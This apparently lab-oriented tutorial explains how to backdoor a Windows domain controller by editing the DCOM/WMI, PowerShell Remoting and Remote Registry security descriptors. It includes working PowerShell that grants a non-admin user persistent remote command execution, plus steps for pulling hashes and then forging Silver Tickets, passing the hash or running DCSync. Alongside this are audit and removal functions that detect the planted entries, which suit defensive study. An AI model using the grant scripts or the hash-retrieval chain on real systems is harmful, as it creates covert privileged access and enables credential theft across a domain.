Modifying Remote Protocol Security Descriptors

This is an interesting way to obtain persistence because the ACLs on remoting protocols (DCOM/WMI, PowerShell Remoting, Remote Registry) are rarely audited.

You need administrative rights on the target to change these descriptors, which for a Domain Controller means Domain Admin (or equivalent). Once changed, they give a chosen non-admin user access to WMI, PowerShell Remoting and the Remote Registry on that machine without adding them to any privileged group.

Subsequently that user can execute commands on the DC despite not being an admin, and the access persists until someone removes the entry.

Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace

Step 1 - In Component Services (dcomcnfg), Change the DCOM Permissions of the Computer

  • Under My Computer > Properties > COM Security, edit the Access Permissions limits and give the user Remote Access

  • Then edit the Launch and Activation Permissions limits and give the user Local Launch, Remote Launch, Local Activation and Remote Activation

Step 2 - Modify the WMI Namespace Security in Computer Management

  • Under Services and Applications > WMI Control > Properties > Security, select the Root namespace and give the user all permissions (including Remote Enable)

  • In Advanced, set the entry to apply to "This namespace and subnamespaces" so the rights are inherited by every child namespace (root\cimv2 is the one most tooling uses)

Step 3 - Check the Access of the Non-Admin User to the DC

With both descriptors changed, the user can query WMI on the DC remotely and execute commands through it (for example by calling Win32_Process Create), even though they are a member of no administrative group.
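The two descriptors those steps touch can be read back from PowerShell, which is also the quickest way to audit a DC for entries that should not be there. The following is an added example, not code from the original page; it is Windows PowerShell 5.1, runs elevated on the DC, and assumes the lab account name student1.

```powershell
# Added audit example (not from the original page): read back the two descriptors the
# manual Steps 1 and 2 change. Windows PowerShell 5.1 (the Wmi cmdlets are absent in
# PowerShell 7). Run elevated on the DC. 'student1' is an assumed lab account.
$User = 'student1'

function Resolve-SidName {
    param([System.Security.Principal.SecurityIdentifier]$Sid)
    try { $Sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $Sid.Value }
}

function ConvertTo-RightNames {
    # Turn an access mask into the names in $Table (mask bit -> name).
    param([int]$Mask, [hashtable]$Table)
    ($Table.Keys | Sort-Object | Where-Object { $Mask -band $_ } | ForEach-Object { $Table[$_] }) -join ','
}

# --- 1. DCOM machine-wide limits (Component Services > COM Security > Edit Limits) ---
# Stored as self-relative security descriptors (REG_BINARY) under HKLM\SOFTWARE\Microsoft\Ole.
$ComAccessRights = @{ 1 = 'Execute'; 2 = 'LocalAccess'; 4 = 'RemoteAccess' }
$ComLaunchRights = @{ 1 = 'Execute'; 2 = 'LocalLaunch'; 4 = 'RemoteLaunch'; 8 = 'LocalActivation'; 16 = 'RemoteActivation' }

function Get-DcomLimitAces {
    param([ValidateSet('MachineAccessRestriction','MachineLaunchRestriction')][string]$Limit)
    $table = if ($Limit -eq 'MachineAccessRestriction') { $ComAccessRights } else { $ComLaunchRights }
    $bytes = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Ole' -Name $Limit -ErrorAction SilentlyContinue).$Limit
    if (-not $bytes) { Write-Warning "$Limit is not set; built-in DCOM defaults apply"; return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)
    foreach ($ace in $sd.DiscretionaryAcl) {
        [pscustomobject]@{
            Limit   = $Limit
            Trustee = Resolve-SidName $ace.SecurityIdentifier
            Type    = $ace.AceType
            Rights  = ConvertTo-RightNames $ace.AccessMask $table
        }
    }
}

# --- 2. WMI namespace DACL (Computer Management > WMI Control > Security) ---
$WmiRights = @{ 1 = 'EnableAccount'; 2 = 'ExecuteMethods'; 4 = 'FullWrite'; 8 = 'PartialWrite';
                16 = 'ProviderWrite'; 32 = 'RemoteEnable'; 131072 = 'ReadSecurity'; 262144 = 'EditSecurity' }

function Get-WmiNamespaceAces {
    param([string]$Namespace = 'root', [string]$ComputerName = '.')
    $out = Invoke-WmiMethod -Namespace $Namespace -Path '__SystemSecurity=@' -Name GetSecurityDescriptor -ComputerName $ComputerName
    if ($out.ReturnValue -ne 0) { throw "GetSecurityDescriptor on $Namespace failed: $($out.ReturnValue)" }
    foreach ($ace in $out.Descriptor.DACL) {
        [pscustomobject]@{
            Namespace = $Namespace
            Trustee   = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
            Type      = if ($ace.AceType -eq 0) { 'Allow' } else { 'Deny' }
            Rights    = ConvertTo-RightNames $ace.AccessMask $WmiRights
            Inherits  = [bool]($ace.AceFlags -band 2)   # CONTAINER_INHERIT_ACE = "this namespace and subnamespaces"
        }
    }
}

# Everything first, then only the entries naming our user. The footprint Steps 1 and 2 leave is:
# RemoteAccess on the access limit, all five launch rights, and an inheriting Allow on root.
'MachineAccessRestriction', 'MachineLaunchRestriction' | ForEach-Object { Get-DcomLimitAces $_ } | Format-Table -AutoSize
Get-WmiNamespaceAces -Namespace 'root' | Format-Table -AutoSize
Get-WmiNamespaceAces -Namespace 'root\cimv2' | Format-Table -AutoSize
'MachineAccessRestriction', 'MachineLaunchRestriction' | ForEach-Object { Get-DcomLimitAces $_ } |
    Where-Object Trustee -like "*\$User" | Format-Table -AutoSize
Get-WmiNamespaceAces | Where-Object Trustee -like "*\$User" | Format-Table -AutoSize
```

Defenders can run the same functions with the filter removed and diff the output against a known-good DC; a non-admin trustee that shows up with RemoteEnable on root and Remote Launch/Activation in the launch limit is exactly this backdoor.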

Giving a User Access to WMI From Powershell

With Set-RemoteWMI.ps1 (from Nishang), which writes the same DCOM and WMI namespace entries the manual procedure above creates

Then log in as that user and check the access:

To Remove the Modified Descriptor (Set-RemoteWMI again with its -Remove switch)
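What Set-RemoteWMI automates can also be done with plain WMI calls against the __SystemSecurity class, which is useful when you do not want to drop Nishang on the box or want to see exactly which ACE gets written. The following is an added example, not Nishang's code, written for Windows PowerShell 5.1; it assumes a DC named dc01 and a user student1, and pairs the namespace change with the DCOM limits (Step 1 of the manual procedure), which have to allow the user as well before a remote connection succeeds.

```powershell
# Added example (not Nishang's code): the WMI namespace half done with __SystemSecurity,
# plus the DCOM limits written directly to the registry. Windows PowerShell 5.1.
# 'dc01' and 'student1' are assumed lab names.

function Get-WmiNamespaceDescriptor {
    param([string]$Namespace, [string]$ComputerName, $Credential)
    $p = @{ Namespace = $Namespace; Path = '__SystemSecurity=@'; ComputerName = $ComputerName }
    if ($Credential) { $p.Credential = $Credential }
    $out = Invoke-WmiMethod @p -Name GetSecurityDescriptor
    if ($out.ReturnValue -ne 0) { throw "GetSecurityDescriptor failed: $($out.ReturnValue)" }
    $out.Descriptor
}

function Set-WmiNamespaceDescriptor {
    param($Descriptor, [string]$Namespace, [string]$ComputerName, $Credential)
    $p = @{ Namespace = $Namespace; Path = '__SystemSecurity=@'; ComputerName = $ComputerName }
    if ($Credential) { $p.Credential = $Credential }
    $out = Invoke-WmiMethod @p -Name SetSecurityDescriptor -ArgumentList $Descriptor.PSObject.ImmediateBaseObject
    if ($out.ReturnValue -ne 0) { throw "SetSecurityDescriptor failed: $($out.ReturnValue)" }
}

function Get-UserSid {
    param([string]$UserName)
    (New-Object System.Security.Principal.NTAccount($UserName)).Translate([System.Security.Principal.SecurityIdentifier])
}

function Grant-WmiNamespaceAccess {
    # Adds an inheriting Allow ACE for the user. 0x6003F is every WMI namespace right
    # (Enable, MethodExecute, FullWrite, PartialWrite, ProviderWrite, RemoteEnable,
    # ReadSecurity, EditSecurity); 0x23 (Enable + MethodExecute + RemoteEnable) is the
    # quieter minimum for remote queries and Win32_Process.Create.
    param([string]$UserName, [string]$ComputerName, [string]$Namespace = 'root', $Credential, [int]$AccessMask = 0x6003F)
    $sid = (Get-UserSid $UserName).Value
    $sd  = Get-WmiNamespaceDescriptor $Namespace $ComputerName $Credential
    if ($sd.DACL | Where-Object { $_.Trustee.SIDString -eq $sid }) { Write-Warning "$UserName is already in the DACL of $Namespace"; return }
    $ace = ([wmiclass]'Win32_ACE').CreateInstance()
    $ace.AccessMask = $AccessMask
    $ace.AceFlags   = 2          # CONTAINER_INHERIT_ACE: child namespaces inherit it
    $ace.AceType    = 0          # ACCESS_ALLOWED_ACE_TYPE
    $trustee = ([wmiclass]'Win32_Trustee').CreateInstance()
    $trustee.SIDString = $sid
    $ace.Trustee = $trustee
    $sd.DACL += $ace.PSObject.ImmediateBaseObject
    Set-WmiNamespaceDescriptor $sd $Namespace $ComputerName $Credential
}

function Revoke-WmiNamespaceAccess {
    param([string]$UserName, [string]$ComputerName, [string]$Namespace = 'root', $Credential)
    $sid  = (Get-UserSid $UserName).Value
    $sd   = Get-WmiNamespaceDescriptor $Namespace $ComputerName $Credential
    $keep = @()
    foreach ($ace in $sd.DACL) { if ($ace.Trustee.SIDString -ne $sid) { $keep += $ace.PSObject.ImmediateBaseObject } }
    $sd.DACL = $keep.PSObject.ImmediateBaseObject
    Set-WmiNamespaceDescriptor $sd $Namespace $ComputerName $Credential
}

function Grant-DcomRemoteAccess {
    # Runs ON the target (local registry, needs admin): appends the user to both DCOM limits
    # with the rights Step 1 of the manual procedure ticks. Remove again via dcomcnfg.
    param([string]$UserName)
    $sid    = Get-UserSid $UserName
    $rights = @{ MachineAccessRestriction = 0x5; MachineLaunchRestriction = 0x1F }   # Execute+RemoteAccess / all launch+activation
    foreach ($limit in @($rights.Keys)) {
        $bytes = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Ole' -Name $limit -ErrorAction SilentlyContinue).$limit
        if (-not $bytes) { throw "$limit is not set (defaults in effect); set it once in dcomcnfg first" }
        $sd  = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)
        $ace = New-Object System.Security.AccessControl.CommonAce([System.Security.AccessControl.AceFlags]::None,
                   [System.Security.AccessControl.AceQualifier]::AccessAllowed, $rights[$limit], $sid, $false, $null)
        $sd.DiscretionaryAcl.InsertAce($sd.DiscretionaryAcl.Count, $ace)
        $new = New-Object byte[] $sd.BinaryLength
        $sd.GetBinaryForm($new, 0)
        Set-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Ole' -Name $limit -Value $new -Type Binary
    }
}

function Test-WmiAccess {
    # Run this in a session as the non-admin user. Both calls fail with "Access denied"
    # (0x80070005) until the DCOM limits and the namespace DACL allow the user.
    param([string]$ComputerName, [string]$Command = 'cmd.exe /c whoami /all > C:\Windows\Temp\wmi_test.txt')
    Get-WmiObject -Class Win32_OperatingSystem -ComputerName $ComputerName | Select-Object CSName, Caption
    $r = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $Command -ComputerName $ComputerName
    "Create returned $($r.ReturnValue) (0 = started, PID $($r.ProcessId))"
}

# Usage (assumed names):
#   on dc01, elevated:   Grant-DcomRemoteAccess -UserName 'student1'
#   from anywhere, DA:   Grant-WmiNamespaceAccess -UserName 'student1' -ComputerName 'dc01' -Credential (Get-Credential)
#   as student1:         Test-WmiAccess -ComputerName 'dc01'
#   cleanup:             Revoke-WmiNamespaceAccess -UserName 'student1' -ComputerName 'dc01' -Credential (Get-Credential)
```

The ACE is keyed on the user's SID, so a password reset or rename does not disturb it; only removing the entry (or deleting the account) does.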

Change the Powershell Remoting Descriptors

With Set-RemotePSRemoting.ps1 (from Nishang), which adds the user to the SDDL of the Microsoft.PowerShell session configuration on the target

Then Execute Commands Remotely on the DC as That User (Invoke-Command or Enter-PSSession)
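PowerShell Remoting access is just the DACL on the session configuration (endpoint), so the same change can be made and audited without Nishang. The following is an added example, not Nishang's code; it is Windows PowerShell 5.1, assumes the names dc01 and student1, and is meant to be run in an elevated console on the DC itself because Set-PSSessionConfiguration restarts WinRM and would drop a remote session it was launched from.

```powershell
# Added example (not Nishang's code): add / remove a non-admin user in the SDDL of the
# default remoting endpoint, then test as that user. Run the Grant/Revoke/Show functions
# in an elevated Windows PowerShell on the DC itself. Assumed names: dc01, student1.
$Endpoint = 'Microsoft.PowerShell'

function Get-EndpointSddl { param([string]$Name = $Endpoint) (Get-PSSessionConfiguration -Name $Name).SecurityDescriptorSddl }

function Get-UserSid { param([string]$UserName)
    (New-Object System.Security.Principal.NTAccount($UserName)).Translate([System.Security.Principal.SecurityIdentifier]) }

function Show-EndpointAccess {
    # Audit view: one row per ACE in the endpoint DACL. On current builds the defaults are
    # BUILTIN\Administrators, BUILTIN\Remote Management Users and NT AUTHORITY\INTERACTIVE;
    # anything else needs an explanation.
    param([string]$Name = $Endpoint)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor((Get-EndpointSddl $Name))
    foreach ($ace in $sd.DiscretionaryAcl) {
        $who = try { $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { $ace.SecurityIdentifier.Value }
        [pscustomobject]@{ Endpoint = $Name; Trustee = $who; Type = $ace.AceType; Mask = '0x{0:X}' -f $ace.AccessMask }
    }
}

function Grant-EndpointAccess {
    param([string]$UserName, [string]$Name = $Endpoint)
    $sid = Get-UserSid $UserName
    $sd  = New-Object System.Security.AccessControl.RawSecurityDescriptor((Get-EndpointSddl $Name))
    if ($sd.DiscretionaryAcl | Where-Object { $_.SecurityIdentifier -eq $sid }) { Write-Warning "$UserName already listed"; return }
    # GA (GENERIC_ALL, 0x10000000) matches the endpoint's own Allow entries, e.g. (A;;GA;;;BA).
    $flags = [System.Security.AccessControl.AceFlags]::None
    $qual  = [System.Security.AccessControl.AceQualifier]::AccessAllowed
    $ace   = New-Object System.Security.AccessControl.CommonAce($flags, $qual, 0x10000000, $sid, $false, $null)
    $sd.DiscretionaryAcl.InsertAce($sd.DiscretionaryAcl.Count, $ace)
    $new = $sd.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)
    Set-PSSessionConfiguration -Name $Name -SecurityDescriptorSddl $new -Force | Out-Null
    $new
}

function Revoke-EndpointAccess {
    param([string]$UserName, [string]$Name = $Endpoint)
    $sid = Get-UserSid $UserName
    $sd  = New-Object System.Security.AccessControl.RawSecurityDescriptor((Get-EndpointSddl $Name))
    for ($i = $sd.DiscretionaryAcl.Count - 1; $i -ge 0; $i--) {
        if ($sd.DiscretionaryAcl[$i].SecurityIdentifier -eq $sid) { $sd.DiscretionaryAcl.RemoveAce($i) }
    }
    $new = $sd.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)
    Set-PSSessionConfiguration -Name $Name -SecurityDescriptorSddl $new -Force | Out-Null
    $new
}

function Test-EndpointAccess {
    # Run as the non-admin user. Before the change WinRM answers "Access is denied".
    param([string]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock { "$(whoami) on $env:COMPUTERNAME" }
}

# Usage (assumed names):
#   on dc01, elevated:  Grant-EndpointAccess -UserName 'student1'; Show-EndpointAccess
#   as student1:        Test-EndpointAccess -ComputerName 'dc01'
#   cleanup:            Revoke-EndpointAccess -UserName 'student1'
```

Note that Microsoft.PowerShell is only the default endpoint; a thorough audit runs Show-EndpointAccess over every name returned by Get-PSSessionConfiguration, since a backdoor could equally be parked in microsoft.powershell32 or a custom configuration.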

Changing the Remote Registry to Add a Backdoor and Retrieve Hashes

Step 1 - With Add-RemoteRegBackdoor.ps1 (from the DAMP toolkit), Grant the User Remote Access to the Registry Keys Holding the SAM, SECURITY and LSA Boot Key Material

Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1 (also from DAMP) to Pull the Machine Account and Local Account Hashes

Step 3 - Exploit

  • With the DC's machine account hash we can forge Silver Tickets for services on the DC (CIFS, LDAP, HOST and so on).

  • The DC's local Administrator hash is the hash of the DSRM account. If DsrmAdminLogonBehavior (under HKLM\SYSTEM\CurrentControlSet\Control\Lsa) is set to 2, that hash can be used over the network via pass-the-hash, for example to DCSync.
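Whatever tool plants it, a remote registry backdoor of this kind has to loosen a small, fixed set of key DACLs: the winreg key that gates the Remote Registry service, SAM and SECURITY, and the four LSA keys whose class names make up the boot key. The following added example (not code from DAMP or the original page) audits exactly those keys on the DC and includes a probe to run as the non-admin user; it is Windows PowerShell 5.1, and the list of expected trustees is an assumption to be baselined against a known-good DC of the same build.

```powershell
# Added audit example (not from DAMP or the original page). Run elevated on the DC.
# Keys a remote-registry hash-retrieval backdoor must open up:
$Keys = @(
    'SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg',  # who may use the Remote Registry service at all
    'SAM\SAM',                                                    # local account hashes (need the boot key to decrypt)
    'SECURITY',                                                   # LSA secrets incl. $MACHINE.ACC and cached domain creds
    'SYSTEM\CurrentControlSet\Control\Lsa\JD',                    # the four keys whose class names form the boot key
    'SYSTEM\CurrentControlSet\Control\Lsa\Skew1',
    'SYSTEM\CurrentControlSet\Control\Lsa\GBG',
    'SYSTEM\CurrentControlSet\Control\Lsa\Data'
)
# Assumed baseline of trustees that legitimately hold explicit entries here; tune it
# against a clean DC of the same build before trusting the "suspicious" list.
$ExpectedTrustees = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'BUILTIN\Backup Operators',
                      'NT AUTHORITY\LOCAL SERVICE', 'CREATOR OWNER',
                      'APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES',
                      'APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES')

function Get-KeyAces {
    param([string]$SubKey)
    # Open with ReadPermissions only: Administrators may read the DACL of SAM\SAM and
    # SECURITY even though they cannot read the key contents.
    $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($SubKey,
        [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadSubTree,
        [System.Security.AccessControl.RegistryRights]::ReadPermissions)
    if (-not $key) { Write-Warning "$SubKey not found"; return }
    try {
        foreach ($rule in $key.GetAccessControl().Access) {
            [pscustomobject]@{
                Key       = $SubKey
                Trustee   = $rule.IdentityReference.Value
                Type      = $rule.AccessControlType
                Rights    = $rule.RegistryRights
                Inherited = $rule.IsInherited
            }
        }
    } finally { $key.Close() }
}

function Find-RegistryBackdoorAces {
    # A planted entry is always explicit (not inherited) and an Allow for someone outside the baseline.
    param([string[]]$Expected = $ExpectedTrustees)
    foreach ($k in $Keys) {
        Get-KeyAces $k | Where-Object { -not $_.Inherited -and $_.Type -eq 'Allow' -and $Expected -notcontains $_.Trustee }
    }
}

function Test-RemoteRegistryAccess {
    # Run as the non-admin user against the DC. Without the backdoor OpenSubKey throws
    # SecurityException on these paths; with it, the subkey counts come back.
    param([string]$ComputerName)
    $hklm = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $ComputerName)
    foreach ($sub in 'SECURITY\Policy\Secrets', 'SAM\SAM\Domains\Account\Users', 'SYSTEM\CurrentControlSet\Control\Lsa\JD') {
        try {
            $k = $hklm.OpenSubKey($sub)
            if ($k) { "$sub : readable ($($k.SubKeyCount) subkeys)"; $k.Close() } else { "$sub : not found" }
        } catch { "$sub : $($_.Exception.GetType().Name)" }
    }
    $hklm.Close()
}

# On the DC, elevated: full picture, then only the suspicious explicit allows.
$Keys | ForEach-Object { Get-KeyAces $_ } | Format-Table -AutoSize
Find-RegistryBackdoorAces | Format-Table -AutoSize
# As the non-admin user:  Test-RemoteRegistryAccess -ComputerName 'dc01'   ('dc01' is an assumed name)
```

The probe deliberately only opens keys and counts subkeys; turning the readable hives into hashes is what RemoteHashRetrieval.ps1 does, and an unexpected Allow from Find-RegistryBackdoorAces is the detection signal regardless of which retrieval tool follows.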
